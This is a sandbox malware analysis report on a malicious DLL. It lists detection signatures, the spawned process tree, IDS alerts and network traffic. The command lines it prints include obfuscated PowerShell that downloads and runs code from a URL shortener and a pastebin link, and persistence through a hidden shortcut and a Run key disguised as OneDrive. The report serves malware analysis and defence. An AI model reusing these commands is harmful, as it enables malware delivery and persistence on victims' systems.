Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HQsitBLlOv.dll

Overview

General Information

Sample name:HQsitBLlOv.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4.exe
Analysis ID:1534112
MD5:285e7d2f11c30f89d10887eef102cd74
SHA1:ce53d9b363bfc3baff51b690f37be27853053fcc
SHA256:2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Obfuscated command line found
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Uses cmd line tools excessively to alter registry or file data
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll64.exe (PID: 4576 cmdline: loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6752 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 3976 cmdline: rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • powershell.exe (PID: 4040 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 4044 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • regsvr32.exe (PID: 1468 cmdline: regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
      • powershell.exe (PID: 2992 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2612 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • rundll32.exe (PID: 5500 cmdline: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
      • powershell.exe (PID: 2536 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2524 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • powershell.exe (PID: 1396 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1292 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6744 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 2188 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1112 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2536INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x17a73b:$b1: ::WriteAllBytes(
  • 0x1f532d:$b1: ::WriteAllBytes(
  • 0x222a9f:$b1: ::WriteAllBytes(
  • 0x16e2c:$s1: -join
  • 0x467d0:$s1: -join
  • 0x538a5:$s1: -join
  • 0x56c77:$s1: -join
  • 0x57329:$s1: -join
  • 0x58e1a:$s1: -join
  • 0x5b020:$s1: -join
  • 0x5b847:$s1: -join
  • 0x5c0b7:$s1: -join
  • 0x5c7f2:$s1: -join
  • 0x5c824:$s1: -join
  • 0x5c86c:$s1: -join
  • 0x5c88b:$s1: -join
  • 0x5d0db:$s1: -join
  • 0x5d257:$s1: -join
  • 0x5d2cf:$s1: -join
  • 0x5d362:$s1: -join
  • 0x5d5c8:$s1: -join
Process Memory Space: powershell.exe PID: 4040INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xace53:$b1: ::WriteAllBytes(
  • 0xb5693:$b1: ::WriteAllBytes(
  • 0xb664a:$b1: ::WriteAllBytes(
  • 0xb668c:$b1: ::WriteAllBytes(
  • 0xb73e7:$b1: ::WriteAllBytes(
  • 0xb7431:$b1: ::WriteAllBytes(
  • 0xd3962:$b1: ::WriteAllBytes(
  • 0xd7e75:$b1: ::WriteAllBytes(
  • 0x19e9c0:$b1: ::WriteAllBytes(
  • 0x16989:$s1: -join
  • 0x54d98:$s1: -join
  • 0x60891:$s1: -join
  • 0x86110:$s1: -join
  • 0x86870:$s1: -join
  • 0xdab14:$s3: reverse
  • 0xdae02:$s3: reverse
  • 0xdb51c:$s3: reverse
  • 0xdbcd5:$s3: reverse
  • 0xe2ec8:$s3: reverse
  • 0xe32e2:$s3: reverse
  • 0xe3e6a:$s3: reverse
Process Memory Space: powershell.exe PID: 2992INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x278e1:$b1: ::WriteAllBytes(
  • 0xdb09f:$b1: ::WriteAllBytes(
  • 0xdcf33:$b1: ::WriteAllBytes(
  • 0xdcf75:$b1: ::WriteAllBytes(
  • 0xdcfb6:$b1: ::WriteAllBytes(
  • 0xdebc7:$b1: ::WriteAllBytes(
  • 0xe5dac:$b1: ::WriteAllBytes(
  • 0x118826:$b1: ::WriteAllBytes(
  • 0x120c72:$b1: ::WriteAllBytes(
  • 0x121b57:$b1: ::WriteAllBytes(
  • 0x121ba2:$b1: ::WriteAllBytes(
  • 0x76472:$s1: -join
  • 0x76bd3:$s1: -join
  • 0xf2f43:$s1: -join
  • 0xf821f:$s1: -join
  • 0x175a44:$s1: -join
  • 0xa8dd6:$s3: reverse
  • 0xa90c4:$s3: reverse
  • 0xa97de:$s3: reverse
  • 0xa9f97:$s3: reverse
  • 0xb11af:$s3: reverse
Process Memory Space: powershell.exe PID: 1396INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xb4e52:$b1: ::WriteAllBytes(
  • 0x196450:$b1: ::WriteAllBytes(
  • 0x207941:$b1: ::WriteAllBytes(
  • 0x2e011:$s1: -join
  • 0x2e771:$s1: -join
  • 0x4128f:$s1: -join
  • 0x412ca:$s1: -join
  • 0x413d1:$s1: -join
  • 0x413ff:$s1: -join
  • 0x41783:$s1: -join
  • 0x417a6:$s1: -join
  • 0x41ae2:$s1: -join
  • 0x41b03:$s1: -join
  • 0x41b35:$s1: -join
  • 0x41b7d:$s1: -join
  • 0x41baa:$s1: -join
  • 0x41bd1:$s1: -join
  • 0x41bfc:$s1: -join
  • 0x41c18:$s1: -join
  • 0x41cdf:$s1: -join
  • 0x4218b:$s1: -join
Process Memory Space: powershell.exe PID: 2248INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x7d801:$b1: ::WriteAllBytes(
  • 0x12a7dc:$b1: ::WriteAllBytes(
  • 0x140ca5:$b1: ::WriteAllBytes(
  • 0x1a7e1:$s1: -join
  • 0x1af41:$s1: -join
  • 0x4a42f:$s1: -join
  • 0x5169d:$s1: -join
  • 0x35b0e:$s3: reverse
  • 0x3aecf:$s3: reverse
  • 0xc0e28:$s3: reverse
  • 0xcae5e:$s3: reverse
  • 0x14ea95:$s3: reverse
  • 0x155717:$s3: reverse
  • 0x1575aa:$s3: reverse
  • 0x1625d9:$s3: reverse
  • 0x17bd2e:$s3: reverse
  • 0x17c01c:$s3: reverse
  • 0x17c736:$s3: reverse
  • 0x17ceef:$s3: reverse
  • 0x183e2d:$s3: reverse
  • 0x184247:$s3: reverse
SourceRuleDescriptionAuthorStrings
amsi64_2536.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_4040.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_2992.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_1396.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1fd:$b1: ::WriteAllBytes(
  • 0xb902:$s1: -join
  • 0x50ae:$s4: +=
  • 0x5170:$s4: +=
  • 0x9397:$s4: +=
  • 0xb4b4:$s4: +=
  • 0xb79e:$s4: +=
  • 0xb8e4:$s4: +=
  • 0xf927:$s4: +=
  • 0xf9a7:$s4: +=
  • 0xfa6d:$s4: +=
  • 0xfaed:$s4: +=
  • 0xfcc3:$s4: +=
  • 0xfd47:$s4: +=
  • 0xd297:$e4: Get-WmiObject
  • 0xd339:$e4: Get-WmiObject
  • 0xde10:$e4: Get-WmiObject
  • 0xdfff:$e4: Get-Process
  • 0xe057:$e4: Start-Process
amsi64_2248.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Click to see the 1 entries

System Summary

barindex
Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1468, ParentProcessName: regsvr32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2992, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5500, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2536, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5500, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2536, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:00:15.804529+020028576591A Network Trojan was detected192.168.2.649832162.159.136.232443TCP
2024-10-15T16:00:25.665151+020028576591A Network Trojan was detected192.168.2.649888162.159.136.232443TCP
2024-10-15T16:00:25.701967+020028576591A Network Trojan was detected192.168.2.649890162.159.136.232443TCP
2024-10-15T16:00:25.715450+020028576591A Network Trojan was detected192.168.2.649889162.159.136.232443TCP
2024-10-15T16:00:41.031749+020028576591A Network Trojan was detected192.168.2.649971162.159.136.232443TCP
2024-10-15T16:00:48.382072+020028576591A Network Trojan was detected192.168.2.650012162.159.136.232443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: HQsitBLlOv.dllReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.5% probability
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49888 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49890 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49889 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: HQsitBLlOv.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
